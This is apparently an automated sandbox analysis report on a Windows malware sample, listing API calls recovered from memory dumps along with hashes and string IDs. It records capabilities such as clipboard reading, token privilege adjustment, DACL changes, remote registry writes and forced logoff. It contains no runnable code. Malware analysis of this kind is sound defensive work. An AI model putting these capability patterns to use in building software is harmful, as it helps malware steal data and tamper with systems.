                                                          • ClientToScreen.USER32(?,?), ref: 002DD878
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 002DD8A8
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 002DD8D2
                                                          • SendMessageW.USER32 ref: 002DD8F5
                                                          • ClientToScreen.USER32(?,?), ref: 002DD947
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 002DD97B
                                                            • Part of subcall function 002529AB: GetWindowLongW.USER32(?,000000EB), ref: 002529BC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002DDA17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 3977979337-4164748364
                                                          • Opcode ID: 98acb8ecf278a473501d2a2a9ff271fdbf6731e27b9d9e379475f7a0f3736eb0
                                                          • Instruction ID: a8279dc7e8df826b5dc910db656d4efc31daedd8da31a4641fc14595b2bb946a
                                                          • Opcode Fuzzy Hash: 98acb8ecf278a473501d2a2a9ff271fdbf6731e27b9d9e379475f7a0f3736eb0
                                                          • Instruction Fuzzy Hash: D9429D31214642AFD725DF28C888BAABBE5FF49310F14061AF599873A1C7B1DCA9CF51
                                                          APIs
                                                            • Part of subcall function 002A9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A93E3
                                                            • Part of subcall function 002A9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A9410
                                                            • Part of subcall function 002A9399: GetLastError.KERNEL32 ref: 002A941D
                                                          • _memset.LIBCMT ref: 002A8F71
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002A8FC3
                                                          • CloseHandle.KERNEL32(?), ref: 002A8FD4
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002A8FEB
                                                          • GetProcessWindowStation.USER32 ref: 002A9004
                                                          • SetProcessWindowStation.USER32(00000000), ref: 002A900E
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 002A9028
                                                            • Part of subcall function 002A8DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8F27), ref: 002A8DFE
                                                            • Part of subcall function 002A8DE9: CloseHandle.KERNEL32(?,?,002A8F27), ref: 002A8E10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                          • String ID: $default$winsta0
                                                          • API String ID: 2063423040-1027155976
                                                          • Opcode ID: e921b97e595c1ca06dd11ba0e2055bd518daed9a89b960c650a91c7241ff61d6
                                                          • Instruction ID: 8c3d283cd0d07de9310cfe50ff11e5f6c5f3274a8efb58d773075d2ce0247b06
                                                          • Opcode Fuzzy Hash: e921b97e595c1ca06dd11ba0e2055bd518daed9a89b960c650a91c7241ff61d6
                                                          • Instruction Fuzzy Hash: 51817B7182024ABFDF119FA5DC89AEEBB79EF05304F044159F918A6260DB718EA5DF20
                                                          APIs
                                                          • OpenClipboard.USER32(002E0980), ref: 002C465C
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 002C466A
                                                          • GetClipboardData.USER32(0000000D), ref: 002C4672
                                                          • CloseClipboard.USER32 ref: 002C467E
                                                          • GlobalLock.KERNEL32(00000000), ref: 002C469A
                                                          • CloseClipboard.USER32 ref: 002C46A4
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 002C46B9
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 002C46C6
                                                          • GetClipboardData.USER32(00000001), ref: 002C46CE
                                                          • GlobalLock.KERNEL32(00000000), ref: 002C46DB
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 002C470F
                                                          • CloseClipboard.USER32 ref: 002C481F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          • Opcode ID: 10b087922ebb3206914c0b1a5e0c8a5e163caa0dcb9b353a693513cc7af826b9
                                                          • Instruction ID: f7e8932ce7769249ecc6c081b27be4b6ca641720c60fb55c08a81d2609290e6c
                                                          • Opcode Fuzzy Hash: 10b087922ebb3206914c0b1a5e0c8a5e163caa0dcb9b353a693513cc7af826b9
                                                          • Instruction Fuzzy Hash: EA51B3312542425BD301FF60ECD9F6F73A8AF85B01F14062DF945D61D1DFB098668B66
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 002BF5F9
                                                          • _wcscmp.LIBCMT ref: 002BF60E
                                                          • _wcscmp.LIBCMT ref: 002BF625
                                                          • GetFileAttributesW.KERNEL32(?), ref: 002BF637
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 002BF651
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 002BF669
                                                          • FindClose.KERNEL32(00000000), ref: 002BF674
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 002BF690
                                                          • _wcscmp.LIBCMT ref: 002BF6B7
                                                          • _wcscmp.LIBCMT ref: 002BF6CE
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BF6E0
                                                          • SetCurrentDirectoryW.KERNEL32(0030B578), ref: 002BF6FE
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF708
                                                          • FindClose.KERNEL32(00000000), ref: 002BF715
                                                          • FindClose.KERNEL32(00000000), ref: 002BF727
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*$S+
                                                          • API String ID: 1803514871-681589224
                                                          • Opcode ID: 58c970526b8bd066af27057f671a4f24b1ea0e1ecbe64a5a2b95b0446b2fcd19
                                                          • Instruction ID: ceaf43426f2cbb3598a63d1a1e170296dcac481f5406c6dc45400f89b7553f28
                                                          • Opcode Fuzzy Hash: 58c970526b8bd066af27057f671a4f24b1ea0e1ecbe64a5a2b95b0446b2fcd19
                                                          • Instruction Fuzzy Hash: 9731033169120A6BDB50DFB4EC8DEDEB3ACAF09361F1001A5E814D60A0DF70CAA5DA60
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002BCDD0
                                                          • FindClose.KERNEL32(00000000), ref: 002BCE24
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BCE49
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002BCE60
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 002BCE87
                                                          • __swprintf.LIBCMT ref: 002BCED3
                                                          • __swprintf.LIBCMT ref: 002BCF16
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • __swprintf.LIBCMT ref: 002BCF6A
                                                            • Part of subcall function 002738C8: __woutput_l.LIBCMT ref: 00273921
                                                          • __swprintf.LIBCMT ref: 002BCFB8
                                                            • Part of subcall function 002738C8: __flsbuf.LIBCMT ref: 00273943
                                                            • Part of subcall function 002738C8: __flsbuf.LIBCMT ref: 0027395B
                                                          • __swprintf.LIBCMT ref: 002BD007
                                                          • __swprintf.LIBCMT ref: 002BD056
                                                          • __swprintf.LIBCMT ref: 002BD0A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          • Opcode ID: 1d537460f77b7acff35ad778084a0506fb6d80afbf0d63f0e14a2e26c9948de6
                                                          • Instruction ID: 763783a36d63a4b942932a09ac10b24453d15578746463ac99f8a32b269db190
                                                          • Opcode Fuzzy Hash: 1d537460f77b7acff35ad778084a0506fb6d80afbf0d63f0e14a2e26c9948de6
                                                          • Instruction Fuzzy Hash: D9A16DB1424340ABC710FFA4D885DAFB7ECEF94705F400919F985C6191EB70EA68CB62
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0FB3
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,002E0980,00000000,?,00000000,?,?), ref: 002D1021
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002D1069
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002D10F2
                                                          • RegCloseKey.ADVAPI32(?), ref: 002D1412
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 002D141F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: eaf991ead639d2bbaffc6459238ce88022eb9bc8cb4f6953f0b037834aa38e0a
                                                          • Instruction ID: 25906364b480170e2e1d8169f1c322b95c357c8f59a32253dcc1a66d0562340f
                                                          • Opcode Fuzzy Hash: eaf991ead639d2bbaffc6459238ce88022eb9bc8cb4f6953f0b037834aa38e0a
                                                          • Instruction Fuzzy Hash: 29025971220611AFCB14EF24C895A2AB7E5FF88714F04895DF8499B7A2CB30ED65CF91
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 002BF756
                                                          • _wcscmp.LIBCMT ref: 002BF76B
                                                          • _wcscmp.LIBCMT ref: 002BF782
                                                            • Part of subcall function 002B4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002B4890
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 002BF7B1
                                                          • FindClose.KERNEL32(00000000), ref: 002BF7BC
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 002BF7D8
                                                          • _wcscmp.LIBCMT ref: 002BF7FF
                                                          • _wcscmp.LIBCMT ref: 002BF816
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 002BF828
                                                          • SetCurrentDirectoryW.KERNEL32(0030B578), ref: 002BF846
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 002BF850
                                                          • FindClose.KERNEL32(00000000), ref: 002BF85D
                                                          • FindClose.KERNEL32(00000000), ref: 002BF86F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*$j+
                                                          • API String ID: 1824444939-2224153375
                                                          • Opcode ID: 0b180a3f06872c0806c4c74e82bcf84add565531ccab2c5db85256d56d412056
                                                          • Instruction ID: 809ce0258856127ae3c2678728e57ccf2193459704ace79b02e14a0e0a8af99d
                                                          • Opcode Fuzzy Hash: 0b180a3f06872c0806c4c74e82bcf84add565531ccab2c5db85256d56d412056
                                                          • Instruction Fuzzy Hash: C331163155024BBBDB10DFB4EC8CADEB3ACDF09360F1001A5E804A61E1DB70CEA6DA60
                                                          APIs
                                                            • Part of subcall function 002A8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002A8E3C
                                                            • Part of subcall function 002A8E20: GetLastError.KERNEL32(?,002A8900,?,?,?), ref: 002A8E46
                                                            • Part of subcall function 002A8E20: GetProcessHeap.KERNEL32(00000008,?,?,002A8900,?,?,?), ref: 002A8E55
                                                            • Part of subcall function 002A8E20: HeapAlloc.KERNEL32(00000000,?,002A8900,?,?,?), ref: 002A8E5C
                                                            • Part of subcall function 002A8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002A8E73
                                                            • Part of subcall function 002A8EBD: GetProcessHeap.KERNEL32(00000008,002A8916,00000000,00000000,?,002A8916,?), ref: 002A8EC9
                                                            • Part of subcall function 002A8EBD: HeapAlloc.KERNEL32(00000000,?,002A8916,?), ref: 002A8ED0
                                                            • Part of subcall function 002A8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002A8916,?), ref: 002A8EE1
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002A8931
                                                          • _memset.LIBCMT ref: 002A8946
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002A8965
                                                          • GetLengthSid.ADVAPI32(?), ref: 002A8976
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 002A89B3
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002A89CF
                                                          • GetLengthSid.ADVAPI32(?), ref: 002A89EC
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002A89FB
                                                          • HeapAlloc.KERNEL32(00000000), ref: 002A8A02
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002A8A23
                                                          • CopySid.ADVAPI32(00000000), ref: 002A8A2A
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002A8A5B
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002A8A81
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002A8A95
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: c7436553266a126ba889657570b6dd315065c5dfdff4c24b4d6fa1f2eeb6f64b
                                                          • Instruction ID: 288c0d71b4c16f6529f5cd34d1088eb9499c4c892bac52e8e706a38f8e39baa4
                                                          • Opcode Fuzzy Hash: c7436553266a126ba889657570b6dd315065c5dfdff4c24b4d6fa1f2eeb6f64b
                                                          • Instruction Fuzzy Hash: 7F614A7195020AFFDF00DFA1EC89AAEBB79FF05300F04811AE855AA291DF719A15CB60
                                                          APIs
                                                            • Part of subcall function 002D147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002D040D,?,?), ref: 002D1491
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D0B0C
                                                            • Part of subcall function 00254D37: __itow.LIBCMT ref: 00254D62
                                                            • Part of subcall function 00254D37: __swprintf.LIBCMT ref: 00254DAC
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002D0BAB
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002D0C43
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002D0E82
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 002D0E8F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: 2ee032ce104623a596c8453cc5fa6b6ebdf8fcaf656ec61752f2a4f5dad8c67c
                                                          • Instruction ID: f03ed558ca3e1000eddde1b26ae8315eeb43a1cd8552652304f527bfd6fc0c19
                                                          • Opcode Fuzzy Hash: 2ee032ce104623a596c8453cc5fa6b6ebdf8fcaf656ec61752f2a4f5dad8c67c
                                                          • Instruction Fuzzy Hash: A0E16D31224211AFCB14DF24C895E2ABBE5EF89714F04896EF849DB361DA30ED55CF51
                                                          APIs
                                                          • __swprintf.LIBCMT ref: 002B4451
                                                          • __swprintf.LIBCMT ref: 002B445E
                                                            • Part of subcall function 002738C8: __woutput_l.LIBCMT ref: 00273921
                                                          • FindResourceW.KERNEL32(?,?,0000000E), ref: 002B4488
                                                          • LoadResource.KERNEL32(?,00000000), ref: 002B4494
                                                          • LockResource.KERNEL32(00000000), ref: 002B44A1
                                                          • FindResourceW.KERNEL32(?,?,00000003), ref: 002B44C1
                                                          • LoadResource.KERNEL32(?,00000000), ref: 002B44D3
                                                          • SizeofResource.KERNEL32(?,00000000), ref: 002B44E2
                                                          • LockResource.KERNEL32(?), ref: 002B44EE
                                                          • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002B454F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                          • String ID:
                                                          • API String ID: 1433390588-0
                                                          • Opcode ID: 86bbd1f640234006a85dd50f78be1e9e16340317f1690b88d56ee735c02551f0
                                                          • Instruction ID: 9a85e6a5ca379e780e1a65b543a509997cab5a5ae86471ce6793aa068a40077f
                                                          • Opcode Fuzzy Hash: 86bbd1f640234006a85dd50f78be1e9e16340317f1690b88d56ee735c02551f0
                                                          • Instruction Fuzzy Hash: 9231A07151125BABCB11AF60ECC8EFB7BBDEB04340F408415F916D6151D774D961CB60
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: 53a96e3cc3b26cb9726319d4a8b9325b43093ead295b835f42e97af18b03919d
                                                          • Instruction ID: 4fd7a74902febe6ab232ae0502972ed733afbe27db90581d7797cc80d9c8f091
                                                          • Opcode Fuzzy Hash: 53a96e3cc3b26cb9726319d4a8b9325b43093ead295b835f42e97af18b03919d
                                                          • Instruction Fuzzy Hash: 3321A1312512119FDB01BF60EC9DF6E77B8EF44725F048119F9069B2A1CBB0AD628F94
                                                          APIs
                                                            • Part of subcall function 00261A36: _memmove.LIBCMT ref: 00261A77
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002BFA83
                                                          • FindClose.KERNEL32(00000000), ref: 002BFB96
                                                            • Part of subcall function 002552B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002552E6
                                                          • Sleep.KERNEL32(0000000A), ref: 002BFAB3
                                                          • _wcscmp.LIBCMT ref: 002BFAC7
                                                          • _wcscmp.LIBCMT ref: 002BFAE2
                                                          • FindNextFileW.KERNEL32(?,?), ref: 002BFB80
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 2185952417-438819550
                                                          • Opcode ID: eb37991ca7908dcab7dfcf65e27d1a6b73d8b0cc9d56e82dcb855f1afc8827d6
                                                          • Instruction ID: 85f7abccd477c1b42e4a1275cf950f25736dd7247a3de515371ed40135f593f5
                                                          • Opcode Fuzzy Hash: eb37991ca7908dcab7dfcf65e27d1a6b73d8b0cc9d56e82dcb855f1afc8827d6
                                                          • Instruction Fuzzy Hash: 7C41B67196021A9FCF54DF64CD99AEEBBB4FF09350F14806AE814A7191EB309EA4CF50
                                                          APIs
                                                            • Part of subcall function 002A9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A93E3
                                                            • Part of subcall function 002A9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A9410
                                                            • Part of subcall function 002A9399: GetLastError.KERNEL32 ref: 002A941D
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 002B57B4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
